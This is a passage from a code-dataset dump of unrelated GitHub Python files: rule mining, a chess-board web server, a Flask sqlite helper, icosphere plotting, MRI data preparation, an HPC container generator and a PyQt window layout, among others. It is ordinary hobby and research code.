len(rules[0][1])\n for i in range(1, indices):\n indices_or_sections.append(int(round(i * nsamples / indices)))\n\n numsections = indices;\n else:\n indices_or_sections = indices\n numsections = len(indices_or_sections) + 1\n\n for i in range(numsections):\n out.append([])\n\n #print(indices_or_sections)\n\n i = 0\n for rule in rules:\n splitlist = np.split(rule[1], indices_or_sections)\n\n j = 0\n for j in range(len(splitlist)):\n out[j].append((rule[0], splitlist[j]))\n\n return out\n\nall_labels_dict = {}\ntrain_labels_dict = {}\ntest_labels_dict = {}\n\nout_written = False\nfor csv_file_path in os.listdir(csv_dir):\n p1_bit = csv_file_path[5:-4]\n\n if not out_written:\n outfp = open(base_all_out_file, \"w\")\n\n csvfp = open(csv_dir + csv_file_path, \"r\")\n\n reader = csv.DictReader(csvfp, delimiter=',')\n\n rules = {}\n label1 = []\n label0 = []\n\n sample_id = 0\n for row in reader:\n for features,sample_bit in row.items():\n if features[:6] == \"p1_bit\":\n label1.append(sample_bit)\n elif not out_written:\n if features not in rules:\n rules[features] = []\n\n rules[features].append(sample_bit)\n\n sample_id = sample_id + 1\n\n\n if not out_written:\n for features,captured_vector in rules.items():\n line = \"{\" + features + \"} \"\n for bit in captured_vector:\n line += str(bit) + \" \"\n\n line += \"\\n\"\n\n outfp.write(line)\n\n out_written = True\n\n for bit in label1:\n if bit == \"1\":\n label0.append(0)\n else:\n label0.append(1)\n\n all_labels_dict[p1_bit] =[(\"{\" + p1_bit + \"=0}\", np.array(label0)), (\"{\" + p1_bit + \"=1}\", np.array(label1))]\n train_labels_dict[p1_bit],test_labels_dict[p1_bit] = csplit(all_labels_dict[p1_bit], [train_test_split])\n\n pycorels.tofile(train_labels_dict[p1_bit], train_dir + p1_bit + \".label\")\n pycorels.tofile(test_labels_dict[p1_bit], test_dir + p1_bit + \".label\")\n\n\n #print(labels_dict)\n\n#if not os.path.isfile(expanded_all_out_file):\nexpanded_all_out_list = pycorels.fastmine(base_all_out_file, cardinality, min_support, gates)\npycorels.tofile(expanded_all_out_list, expanded_all_out_file)\n\n#if not os.path.isfile(train_out_file) or not os.path.isfile(test_out_file):\ntrain_out_list,test_out_list = csplit(expanded_all_out_list, [train_test_split])\n\n#print(train_out_list)\n\npycorels.tofile(train_out_list, train_out_file)\npycorels.tofile(test_out_list, test_out_file)\n\n\n\nfor p1_bit,labels in train_labels_dict.items():\n# if int(p1_bit[6:]) not in generate_bits:\n# continue\n\n log = train_dir + p1_bit + \".log\"\n opt = train_dir + p1_bit + \".opt\"\n #if not os.path.isfile(opt):\n for nnodes in maxnodes:\n a = pycorels.run(train_out_file, labels, c = c, opt_file=opt, max_num_nodes=nnodes, map_type = map_type, log_file=log, verbosity=verbosity)\n\n if a > min_accuracy:\n print(\"Accuracy: \" + str(a))\n continue\n\n if a < min_accuracy:\n \t print(\"Accuracy: \" + str(a))\n","repo_name":"fingoldin/reactions","sub_path":"reactions/generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":3884,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"11790480412","text":"# Pedir al usuario que ingrese los números separados por espacios\r\nl = input(\"Ingrese los números separados por espacios: \")\r\n# Convertir la l en una lista de números reales y se utiliza el split para dividir los numeros de manera individual\r\nnumeros = [float(i) for i in l.split()]\r\n# Calcular la suma de los elementos en la lista numeros\r\nsuma = sum(numeros)\r\n# Calcular la cantidad de elementos en la lista numeros\r\nn = len(numeros)\r\n# Calcular el promedio\r\npromedio = suma / n\r\n\r\n# Imprimir el resultado\r\nprint(\"El promedio de\" + str(numeros) + \" es: \" + str(promedio))\r\n","repo_name":"Marifer206/ARREGLOS","sub_path":"RETO 10/PUNTO #1 RETO 10.py","file_name":"PUNTO #1 RETO 10.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"365265015","text":"#530. Minimum Absolute Difference in BST\n\"\"\"\nGiven a binary search tree with non-negative values, find the minimum absolute difference between values of any two nodes.\n\"\"\"\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def getMinimumDifference(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: int\n \"\"\"\n vals = []\n \n self.getMinDiffHelper(root, vals)\n \n minVal = vals[1] - vals[0]\n \n for i in range(2,len(vals)):\n temp = vals[i] - vals[i-1]\n if temp < minVal:\n minVal = temp\n \n return minVal\n \n def getMinDiffHelper(self, root, vals):\n \n if root == None:\n return\n \n self.getMinDiffHelper(root.left, vals)\n vals.append(root.val)\n self.getMinDiffHelper(root.right, vals)\n \n","repo_name":"victorplusc/Algorithms","sub_path":"Leetcode/530. Minimum Absolute Difference in BST.py","file_name":"530. Minimum Absolute Difference in BST.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"28987973204","text":"from aiohttp import web\nimport aiohttp\nimport json\nimport requests\nimport argparse\nimport cairosvg\n\nimport tensorflow as tf\nfrom tensorflow.keras import models\nimport numpy as np\n\nfrom recognize import perform_recognition\nfrom generate_tiles import generate_tiles_from_random_chessboard\nfrom generate_chessboards import generate_random_chessboards, generate_random_chessboard\nfrom server import Service\n\nfrom constants import TILES_DIR, NN_MODEL_PATH, FEN_CHARS, USE_GRAYSCALE, DETECT_CORNERS\n\nservice = Service()\n\n\n# board.svg?fen=5r1k/1b4pp/3pB1N1/p2Pq2Q/PpP5/6PK/8/8&lastMove=f4g6&check=h8&arrows=Ge6g8,Bh7&squares=a3,c3\nasync def render_svg(request):\n svg_data = service.make_svg(request)\n print(type(svg_data))\n return aiohttp.web.Response(text=svg_data, content_type=\"image/svg+xml\")\n\n\n# board.png?fen=5r1k/1b4pp/3pB1N1/p2Pq2Q/PpP5/6PK/8/8&lastMove=f4g6&check=h8&arrows=Ge6g8,Bh7&squares=a3,c3\nasync def render_png(request):\n svg_data = service.make_svg(request)\n png_data = cairosvg.svg2png(bytestring=svg_data)\n with open(\"output.png\", \"wb\") as file:\n file.write(png_data)\n\n return aiohttp.web.Response(body=png_data, content_type=\"image/png\")\n\n\nasync def recognize_chessboard(request):\n chessboard_image_path = \"./chessboard.png\"\n model = models.load_model(NN_MODEL_PATH)\n\n mock_args = argparse.Namespace()\n mock_args.quiet = False\n mock_args.debug = False\n mock_args.image_path = chessboard_image_path\n\n print(\"recognizer\")\n print(mock_args)\n\n response = perform_recognition(mock_args, chessboard_image_path)\n return web.Response(text=response)\n\n\nasync def generate_tiles_from_chessboards(request):\n zip_file_path = generate_tiles_from_random_chessboard()\n\n response = web.FileResponse(zip_file_path)\n response.headers[\"Content-Disposition\"] = 'attachment: filename=\"example.zip'\n return response\n\n\nasync def generate_chessboard(request):\n filepath = generate_random_chessboard(\"http://www.fen-to-image.com/image/32/{}\")\n return web.FileResponse(filepath, headers={\"Content-Type\": \"image/png\"})\n \n\napp = web.Application()\napp.router.add_get(\"/recognize\", recognize_chessboard)\napp.router.add_get(\"/generate-chessboard\", generate_chessboard)\napp.router.add_get(\n \"/generate-tiles-from-random-chessboard\", generate_tiles_from_chessboards\n)\napp.router.add_get(\"/board.svg\", render_svg)\napp.router.add_get(\"/board.png\", render_png)\n\nweb.run_app(app)\n","repo_name":"vishalv87/rpz_web_api","sub_path":"app_server.py","file_name":"app_server.py","file_ext":"py","file_size_in_byte":2438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"41911403015","text":"#!/usr/bin/env python\n\nfrom distutils.version import LooseVersion, StrictVersion\nimport json\nimport sys\n\nbuilds = json.load(sys.stdin)\n\npackages = dict()\nrecent = dict()\n\nfor b in builds.values():\n if ',' in b['VERSION']: continue\n if not b['NAME'] in packages:\n packages[b['NAME']] = dict()\n packages[b['NAME']][b['VERSION']] = b['HASH']\n\nfor pkg,vers in packages.items():\n for v, h in vers.items():\n if pkg in recent:\n if LooseVersion(v) > LooseVersion(recent[pkg][0]):\n recent[pkg] = (v, h)\n else:\n recent[pkg] = (v, h)\n\njson.dump(recent, sys.stdout, indent=2)\n","repo_name":"nhazekam/hep-portable-packages","sub_path":"simulation/recent.py","file_name":"recent.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"24238156820","text":"import sqlite3\nimport time\nimport math\nimport re\nfrom flask import url_for\n\n\nclass FDataBase:\n def __init__(self, db):\n self.__db = db\n self.__cur = db.cursor()\n\n def get_menu(self):\n sql = 'SELECT * FROM mainmenu'\n try:\n self.__cur.execute(sql)\n res = self.__cur.fetchall()\n if res:\n return res\n except IOError:\n print('Ошибка чтения из базы данных')\n return []\n\n def add_product(self, title, text, price, url):\n try:\n self.__cur.execute('SELECT COUNT() as \"count\" FROM products WHERE url LIKE ?', (url,))\n res = self.__cur.fetchone()\n if res['count'] > 0:\n print('Товар с таким url уже существует')\n return False\n base = url_for('static', filename='images')\n text = re.sub(r\"(?P]*src=)(?P[\\\"'])(?P.+?)(?P=quote)>\", r\"\\g\" + base +\n r\"/\\g>\", text)\n tm = math.floor(time.time())\n self.__cur.execute('INSERT INTO products VALUES(NULL, ?, ?, ?, ?, ?)', (title, text, price, url, tm))\n self.__db.commit()\n except sqlite3.Error as e:\n print('Ошибка добавления товара в базу данных' + str(e))\n return False\n return True\n\n def get_product(self, alias):\n try:\n self.__cur.execute(f'SELECT title, text, price FROM products WHERE url LIKE \"{alias}\" LIMIT 1')\n res = self.__cur.fetchone()\n if res:\n return res\n\n except sqlite3.Error as e:\n print('Ошибка добавления продукта в базу данных' + str(e))\n\n return False, False\n\n def get_post_anonce(self):\n try:\n self.__cur.execute(f'SELECT id, title, text, price, url FROM products ORDER BY time DESC')\n res = self.__cur.fetchall()\n if res:\n return res\n except sqlite3.Error as e:\n print('Ошибка добавления продукта в базу данных' + str(e))\n\n return []\n","repo_name":"NeDimaN/Python123","sub_path":"HomeWork_51/hw_FDataBase.py","file_name":"hw_FDataBase.py","file_ext":"py","file_size_in_byte":2237,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22759299812","text":"import sys\nimport os\n\nimport trimesh\nfrom trimesh import creation\n\nimport scipy.io\n\nimport random\nimport argparse\nimport numpy as np\n\nimport matplotlib.pyplot as plt\nimport matplotlib.colors\nimport mpl_toolkits.mplot3d\n\nsys.path.append(os.path.abspath(os.path.dirname(os.path.dirname(__file__))))\n# import get_param as parameters\n\nfrom utils.sphere_grid import Icosphere\n\n\ndef main(ico_depth):\n print(\"Generate and Save Icosphere grids ... depth: \", ico_depth)\n # Get parameters\n # project_dir = '/root/Projects/DL_based_SSL_project/DL_based_SSL'\n\n # saving_dir = os.path.join(project_dir, 'utils')\n\n # saving_np_dir = os.path.join(saving_dir, 'icosphere_vertices_d%d' % ico_dpeth)\n # saving_mat_dir = os.path.join(saving_dir, 'icosphere_vertices_d%d.mat' % ico_dpeth)\n\n # icosphere = trimesh.creation.icosphere(ico_dpeth)\n # icosphere_vertices = np.array(icosphere.vertices)\n\n # np.save(saving_np_dir, icosphere_vertices)\n # scipy.io.savemat(saving_mat_dir, {'icosphere_vertices': icosphere_vertices})\n\n # icosphere, face = utils.icosphere.icosphere(ico_dpeth)\n # icosphere_vertices = np.array(icosphere.vertices)\n\n icosphere_node = Icosphere(ico_depth)\n\n ############################################################################\n ### Steering\n steer_neigh_list = [[] for i in range(ico_depth + 1)]\n child_point_list = []\n for idx in range(len(icosphere_node.steer_vertice_list[0])):\n child_point_list.append(idx)\n\n for tmp_depth in range(ico_depth + 1):\n vertice = icosphere_node.steer_vertice_list[tmp_depth]\n\n steering_vertex_idx = random.choice(child_point_list)\n # For debugging\n if tmp_depth == 0:\n steering_vertex_idx = 8\n\n neigh_indice = vertice[steering_vertex_idx].neighbor_indice\n\n steer_neigh_list[tmp_depth].append(steering_vertex_idx)\n for neigh_idx in neigh_indice:\n steer_neigh_list[tmp_depth].append(neigh_idx)\n\n print(\"[Depth \", tmp_depth, \"]\")\n print(\" Child, \", child_point_list)\n print(\" .. Steering idx, \", steering_vertex_idx)\n print(\" .. Neigh, \", neigh_indice)\n print(\" .. Neigh, \", steer_neigh_list[tmp_depth])\n\n\n\n child_vertice = vertice[steering_vertex_idx].child_indice\n child_point_list.clear()\n for child_vertex in child_vertice:\n child_point_list.append(child_vertex)\n ############################################################################\n print(\"**************************\")\n\n\n fig = plt.figure()\n for tmp_depth in range(ico_depth + 1):\n\n vertices = icosphere_node.steer_vertice_list[tmp_depth]\n faces = icosphere_node.steer_faces_list[tmp_depth]\n faces_np = np.array(faces)\n vertices_np = np.array([vertex.get_pos() for vertex in vertices])\n\n # basic mesh color, divided in 20 groups (one for each original face)\n jet = matplotlib.cm.tab20(np.linspace(0,1,20))\n jet = np.tile(jet[:,:3], (1, faces_np.shape[0]//20))\n jet = jet.reshape(faces_np.shape[0], 1, 3)\n\n # computing face shading intensity based on face normals\n face_normals = np.cross(vertices_np[faces_np[:,1]]-vertices_np[faces_np[:,0]],\n vertices_np[faces_np[:,2]]-vertices_np[faces_np[:,0]])\n\n face_normals /= np.sqrt(np.sum(face_normals**2, axis=1, keepdims=True))\n light_source = matplotlib.colors.LightSource(azdeg=60, altdeg=30)\n intensity = light_source.shade_normals(face_normals)\n\n # blending face colors and face shading intensity\n rgb = light_source.blend_hsv(rgb=jet, intensity=intensity.reshape(-1,1,1))\n\n # adding alpha value, may be left out\n # rgba = np.concatenate((rgb, 0.9*np.ones(shape=(rgb.shape[0],1,1))), axis=2)\n rgba = np.concatenate((rgb, 0.3*np.ones(shape=(rgb.shape[0],1,1))), axis=2)\n\n # creating mesh with given face colors\n poly = mpl_toolkits.mplot3d.art3d.Poly3DCollection(vertices_np[faces_np])\n poly.set_facecolor(rgba.reshape(-1,4))\n poly.set_edgecolor('black')\n poly.set_linewidth(0.25)\n\n # and now -- visualization!\n ax = fig.add_subplot(2,3,tmp_depth + 1, projection='3d')\n ax.add_collection3d(poly)\n\n # Add steering points\n\n # Extract steering points\n # if tmp_depth == 1:\n # # steer_neigh = [8, 31, 30, 40, 39, 41] # Children of 8\n # steer_neigh = [7, 17, 8, 30, 39, 28]\n # steer_neigh_points = vertices_np[steer_neigh]\n # else:\n # steer_neigh = steer_neigh_list[tmp_depth]\n # steer_neigh_points = vertices_np[steer_neigh]\n\n steer_neigh = steer_neigh_list[tmp_depth]\n steer_neigh_points = vertices_np[steer_neigh]\n\n ax.scatter(steer_neigh_points[:, 0], steer_neigh_points[:, 1], steer_neigh_points[:, 2], color='r')\n # print(\"Points: \")\n # for steering_points in steer_neigh_points:\n # print(\"(\", steering_points, \")\", end=\" \")\n\n ax.set_xlim(-1,1)\n ax.set_ylim(-1,1)\n ax.set_zlim(-1,1)\n\n ax.set_xticks([-1,0,1])\n ax.set_yticks([-1,0,1])\n ax.set_zticks([-1,0,1])\n\n ax.set_title(f'nu={tmp_depth + 1}')\n fig.suptitle('Icospheres with different subdivision frequency')\n\n plt.show()\n # print(\"Icosphere vertices are saved ... \", icosphere_vertices.shape)\n # print(\"Test\")\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Execute generate_icosphere_vertices')\n\n parser.add_argument('--ico_depth', metavar='ico_depth', type=int, default=3)\n args = parser.parse_args()\n\n try:\n # sys.exit(main(args.use_sslr, args.use_dcase, args.epoch, args.batch, args.model_version))\n sys.exit(main(args.ico_depth))\n except (ValueError, IOError) as e:\n sys.exit(e)","repo_name":"InkyuAn/MicPairTrain","sub_path":"utils/generate_icosphere_vertices.py","file_name":"generate_icosphere_vertices.py","file_ext":"py","file_size_in_byte":5870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"35604714244","text":"import glob\nimport os\nimport shutil\nfrom pathlib import Path\n\nfrom bs4 import BeautifulSoup as bs4\n\n\ndef copy_driver(path: str,\n outfile: str,\n clever_naming=True,\n is_xml=False):\n if is_xml:\n results = os.path.join(path, 'result.xml')\n else:\n results = os.path.join(path, 'result.json')\n res_obj = Path(results)\n # res_path = res_obj.name\n new_name = res_obj.parts[-2] # extracts filename from results just in case\n if clever_naming:\n with open(results, encoding='utf-8') as file:\n soup = bs4(file, 'lxml')\n new_name = soup.find('package').string\n if is_xml:\n cp_result = os.path.join(outfile, f'{new_name}.xml')\n else:\n cp_result = os.path.join(outfile, f'{new_name}.json')\n # cp_path = Path(cp_result)\n # print(f'Copying {res_obj} to {cp_path}')\n shutil.copyfile(results, cp_result)\n\n\ndef copy(path: str, outfile: str,\n clever_naming=True,\n is_xml=False):\n if not os.path.isdir(outfile):\n try:\n os.mkdir(outfile)\n except OSError:\n pass\n copy_driver(path, outfile, clever_naming=clever_naming, is_xml=is_xml)\n\n\ndef bulkcopy(path: str, outfile: str,\n clever_naming=True, is_xml=False) -> None:\n globpath = os.path.join(path, '*', '')\n dirs = glob.glob(globpath)\n target = os.path.join(path, outfile, '')\n print(f'Copying results to {target}.')\n failures = 0\n if not os.path.isdir(target):\n try:\n os.mkdir(target) # create directory if it doesn't exist\n except OSError:\n # print(f'error creating {target}')\n pass\n if target in dirs:\n dirs.remove(target) # remove from list\n # print(dirs)\n for dir in dirs:\n try:\n copy_driver(dir, outfile,\n clever_naming=clever_naming, is_xml=is_xml)\n except FileNotFoundError as fnfe:\n failures += 1\n print(fnfe)\n if failures > 0:\n print(f'{len(dirs)} directories found, {failures} errors.')\n else:\n print(f'Operation completed successfully on {len(dirs)} files.')\n","repo_name":"AnonMuk/static-analyzer","sub_path":"copier.py","file_name":"copier.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"32008439794","text":"#count down\ndef count_down(num):\n list = []\n for i in range(0, num+1):\n list.append(num)\n num -= 1\n return list\n\nprint(count_down(6))\n\n#print and return\ndef print_and_return(list):\n print(list[0])\n return list[1]\n\nprint(print_and_return([3, 9]))\n\n#first plus length\ndef first_plus_length(list):\n return list[0]+len(list)\n\nprint(first_plus_length([2, 6, 8]))\n\n#values greater than second\ndef greater_than(list):\n new_list=[]\n num=0\n for i in range(0, len(list)):\n if list[i] > list[1]:\n new_list.append(list[i])\n num += 1\n print(str(num) + \" value(s) are greater than index 2\")\n return new_list\n\ngreater_than([2, 3, 4])\n\n#This length, that value\ndef len_and_value(length, value):\n list = []\n for i in range(length):\n list.append(value)\n # print(list)\n return list\n\nlen_and_value(3, 7)","repo_name":"woox99/Python","sub_path":"10_Assignments/60_Function_Basic_II/file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"39626788876","text":"s = input()\ncount = 0\n\nt= int(input())\nwhile(t!=0):\n if len(s)%2 !=0 :\n #print(len(s))\n print(\"NET\")\n\n else:\n #i = 1\n x = list(s)\n for i in range(1,len(x)):\n #print(abs(int(s[i])-int(s[i-1])))\n if abs(int(x[i])-int(x[i-1]))==1:\n \n del(x[i],x[i-1])\n count = count+1\n print(count)\n\n if count%2!=0:\n print(\"DA\")\n\n else:\n print(\"NET\")\n t = t-1 ","repo_name":"sandilya761/Codeforces","sub_path":"1373B:01game.py","file_name":"1373B:01game.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73789328088","text":"import pandas as pd\nimport numpy as np\nimport os\nimport h5py\nimport sys\nsys.path.append('../')\nfrom common_fcns import combine_all_coils, resize_scan, k_encode, quantize\n\nif __name__ == '__main__':\n # Load in the scans, compute k_encoding, save off\n data_dir = '../data/multicoil_test/'\n train_slice_name = []\n train_slice_wavelet = []\n train_slice_image = []\n test_slice_name = []\n test_slice_wavelet = []\n test_slice_image = []\n K = 3000 #fix K for 'good' value\n #iterate through directory\n ii = 0\n for file in os.listdir(data_dir):\n print(\"Processing Scan \"+str(ii))\n f = os.path.join(data_dir, file)\n hf = h5py.File(f)\n volume_kspace = hf['kspace'][()]\n n_slices = volume_kspace.shape[0]\n filename = file.split('.')\n for slice_idx in range(n_slices):\n X_raw = combine_all_coils(volume_kspace,slice_idx)\n X = resize_scan(X_raw)\n X_encode = np.array(k_encode(K,X)).flatten()\n X = np.array(X).flatten()\n if filename[0]=='file_brain_AXT2_200_2000482':\n test_slice_name.append(filename[0]+'_'+str(slice_idx))\n test_slice_wavelet.append(quantize(X_encode))\n test_slice_image.append(quantize(X))\n else:\n train_slice_name.append(filename[0]+'_'+str(slice_idx))\n train_slice_wavelet.append(quantize(X_encode))\n train_slice_image.append(quantize(X))\n #print(X_encode.shape)\n ii+=1\n\n # Make a nice DataFrame of the samples\n train_d = {'slice_name': train_slice_name, 'slice': train_slice_wavelet}\n train_df = pd.DataFrame(data=train_d)\n train_result = train_df.to_json(r'../data/train_set_wavelet.json')\n test_d = {'slice_name': test_slice_name, 'slice': test_slice_wavelet}\n test_df = pd.DataFrame(data=test_d)\n test_result = test_df.to_json(r'../data/test_set_wavelet.json')\n\n # Make DFs of the pre-wavelet images\n train_d = {'slice_name': train_slice_name, 'slice': train_slice_image}\n train_df = pd.DataFrame(data=train_d)\n train_result = train_df.to_json(r'../data/train_set_image.json')\n test_d = {'slice_name': test_slice_name, 'slice': test_slice_image}\n test_df = pd.DataFrame(data=test_d)\n test_result = test_df.to_json(r'../data/test_set_image.json')\n\n ","repo_name":"athornton1618/MRI_Compression","sub_path":"utils/prepare_data.py","file_name":"prepare_data.py","file_ext":"py","file_size_in_byte":2361,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"2466991690","text":"def FizzBuzz():\n for i in range(100):\n if i % 3 == 0 and i % 5 == 0:\n print(\"FizzBuzz\")\n elif i % 3 == 0:\n print(\"Fizz\")\n elif i % 5 == 0:\n print(\"Buzz\")\n else:\n print(i)\n\ndef loopTest():\n for n in range(1, 11):\n print(n)\n\ndef loopTestBy2():\n for n in range(0, 11, 2):\n print(n)\n\ndef loopTestBackwards():\n for n in range(10, 0, -1):\n print(n)\n\nloopTestBackwards()","repo_name":"andrewsloss/python-code-library","sub_path":"PythonBasics/ForLoops.py","file_name":"ForLoops.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26046450141","text":"import sys\nfrom typing import Tuple, List, Dict, Union\n\nimport hpccm\nfrom hpccm.primitives import shell, environment\nfrom hpccm.building_blocks.packages import packages\nfrom hpccm.building_blocks.cmake import cmake\nfrom hpccm.building_blocks.gnu import gnu\nfrom hpccm.building_blocks.llvm import llvm\nfrom hpccm.templates.git import git\nfrom hpccm.templates.CMakeBuild import CMakeBuild\n\ndef add_alpaka_dep_layer(stage : hpccm.Stage, ubuntu_version : str,\n cuda_support : bool, extra_compiler : List[str],\n alpaka=False) -> bool:\n \"\"\"Add all dependencies to an hpccm stage that are necessary to build and run Alpaka.\n\n :param stage: At least a baseimage\n :type stage: hpccm.Stage\n :param ubuntu_version: Ubuntu version number: '16.04' or '18.04'\n :type ubuntu_version: str\n :param cuda_support: Set True, if the Stage supports CUDA\n :type cuda_support: bool\n :param extra_compiler: List of compilers, which are installed additional to the system compiler. Supported are: gcc:[5-9], clang:[5.0-7.0, 8-9]\n :type extra_compiler: str\n :param alpaka: install alpaka in /usr/local\n :type alpaka: bool\n :returns: Returns True if function was successful\n :rtype: bool\n\n \"\"\"\n if ubuntu_version != '16.04' and ubuntu_version != '18.04':\n print('not supported Ubuntu version: ' + ubuntu_version, file=sys.stderr)\n print('supported are: 16.04, 18.04', file=sys.stderr)\n return False\n\n apt_package_list = ['gcc', 'g++', 'make', 'software-properties-common',\n 'wget', 'libc6-dev', 'libomp-dev', 'unzip', 'git']\n\n if ubuntu_version == '16.04':\n apt_package_list.append('gnupg-agent')\n if ubuntu_version == '18.04':\n apt_package_list.append('gpg-agent')\n\n stage += packages(ospackages=apt_package_list)\n\n stage += cmake(eula=True, version='3.16.0')\n\n # install extra compiler\n if extra_compiler is not None:\n for com in extra_compiler:\n if com.startswith('gcc'):\n stage += gnu(extra_repository=True, version=com[len('gcc:'):])\n if com.startswith('clang'):\n add_clang(stage, ubuntu_version, version=com[len('clang:'):])\n\n #install boost\n stage += shell(commands=['add-apt-repository -y ppa:mhier/libboost-latest'])\n stage += packages(ospackages=['boost1.67'])\n\n if cuda_support:\n stage += environment(\n variables={'LD_LIBRARY_PATH': '$LD_LIBRARY_PATH:/usr/local/cuda/lib64'})\n # alpaka use a function direct from the cuda driver library\n # in the container, the cuda libraries are not at the default path\n stage += environment(\n variables={'LIBRARY_PATH': '$LIBRARY_PATH:/usr/local/cuda/lib64/stubs'})\n stage += environment(\n variables={'CMAKE_PREFIX_PATH': '/usr/local/cuda/lib64/stubs/'})\n\n if alpaka:\n git_alpaka = git()\n cmake_alpaka = CMakeBuild()\n alpaka_commands = []\n alpaka_commands.append(git_alpaka.clone_step(\n repository='https://github.com/alpaka-group/alpaka.git',\n path='/opt'))\n alpaka_commands.append(cmake_alpaka.configure_step(build_directory='build',\n directory='/opt/alpaka',\n opts=['-Dalpaka_BUILD_EXAMPLES=OFF',\n '-DBUILD_TESTING=OFF']))\n alpaka_commands.append(cmake_alpaka.build_step(target='install'))\n alpaka_commands.append('rm -rf /opt/alpaka')\n\n stage += shell(commands=alpaka_commands)\n\n return True\n\ndef add_clang(stage : hpccm.Stage, ubuntu_version : str, version : str):\n \"\"\"Add commands to stage to install clang.\n\n :param stage: hpccm Stage\n :type stage: hpccm.Stage\n :param ubuntu_version: Ubuntu version number: '16.04' or '18.04'\n :type ubuntu_version: str\n :param version: Clang version: 5.0 - 7.0 or 8 - 9\n :type version: str\n\n \"\"\"\n if ubuntu_version == '16.04':\n distro_name = 'xenial'\n elif ubuntu_version == '18.04':\n distro_name = 'bionic'\n else:\n print('clang error: unsupported Ubuntu version: ' + ubuntu_version, file=sys.stderr)\n print('supported Ubuntu version: 16.04, 18.04', file=sys.stderr)\n return\n\n # clang/llvm changed its name pattern and the ppa sources with clang 8\n # https://apt.llvm.org/\n ppa_version = '' if float(version) < 8.0 else '-' + str(version)\n\n stage += shell(commands=['wget http://llvm.org/apt/llvm-snapshot.gpg.key',\n\t 'apt-key add llvm-snapshot.gpg.key',\n\t 'rm llvm-snapshot.gpg.key',\n\t 'echo \"\" >> /etc/apt/sources.list',\n\t 'echo \"deb http://apt.llvm.org/' + distro_name +\n '/ llvm-toolchain-' + distro_name + ppa_version + ' main\" >> /etc/apt/sources.list',\n 'echo \"deb-src http://apt.llvm.org/' + distro_name +\n '/ llvm-toolchain-' + distro_name + ppa_version + ' main\" >> /etc/apt/sources.list'\n ])\n stage += llvm(version=str(version))\n","repo_name":"ComputationalRadiationPhysics/crp-container","sub_path":"Alpaka/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":5226,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"} +{"seq_id":"24247830138","text":"from PyQt5.QtGui import QFont\nfrom PyQt5.QtWidgets import (\n QMainWindow,\n QVBoxLayout,\n QHBoxLayout,\n QSpacerItem,\n QSizePolicy,\n QGridLayout,\n QPushButton,\n QScrollArea,\n QTabWidget,\n QGroupBox,\n QMenuBar,\n QWidget,\n QAction,\n QMenu\n)\nfrom PyQt5.QtCore import (\n QMetaObject,\n QSize,\n QRect,\n Qt\n)\n\nfrom ..constants import *\n\n\nclass Ui_MainWindow(object):\n def setupUi(self, MainWindow: QMainWindow):\n MainWindow.setWindowTitle(\"Browse Games\")\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(MAIN_WD, MAIN_HT)\n MainWindow.setMinimumSize(QSize(MAIN_WD, MAIN_HT))\n MainWindow.setMaximumSize(QSize(MAIN_WD, MAIN_HT))\n font = QFont()\n font.setFamily(FONT_FAMILY)\n font.setPointSize(FONT_SZ_DEFAULT)\n MainWindow.setFont(font)\n MainWindow.setStyleSheet(f\"\"\"\\\nQGroupBox {{\n color: #849db8;\n border: 1px solid #849db8;\n font-family: {FONT_FAMILY};\n padding: {PAD*2}px {PAD}px {PAD}px {PAD}px;\n margin-top: 1em;\n}}\nQGroupBox::title {{\n subcontrol-origin: margin;\n subcontrol-position: {GBOX_POSITION};\n left: {GBOX_OFFSET};\n}}\"\"\")\n\n self.centralwidget = QWidget(MainWindow)\n self.centralwidget.setObjectName(\"centralwidget\")\n self.vLayout_centralwidget = QVBoxLayout(self.centralwidget)\n self.vLayout_centralwidget.setContentsMargins(PAD, PAD, PAD, PAD)\n self.vLayout_centralwidget.setSpacing(PAD)\n self.vLayout_centralwidget.setObjectName(\"vLayout_centralwidget\")\n\n self.hLayout_search = QHBoxLayout()\n self.hLayout_search.setSpacing(0)\n self.hLayout_search.setObjectName(\"hLayout_search\")\n spacerItem = QSpacerItem(\n 40, 20, QSizePolicy.Expanding, QSizePolicy.Minimum)\n self.hLayout_search.addItem(spacerItem)\n self.gBox_search = QGroupBox(self.centralwidget)\n self.gBox_search.setTitle(\"Search\")\n sizePolicy = QSizePolicy(\n QSizePolicy.Fixed, QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(\n self.gBox_search.sizePolicy().hasHeightForWidth())\n self.gBox_search.setSizePolicy(sizePolicy)\n self.gBox_search.setMinimumSize(\n QSize(SEARCH_MIN_WD, 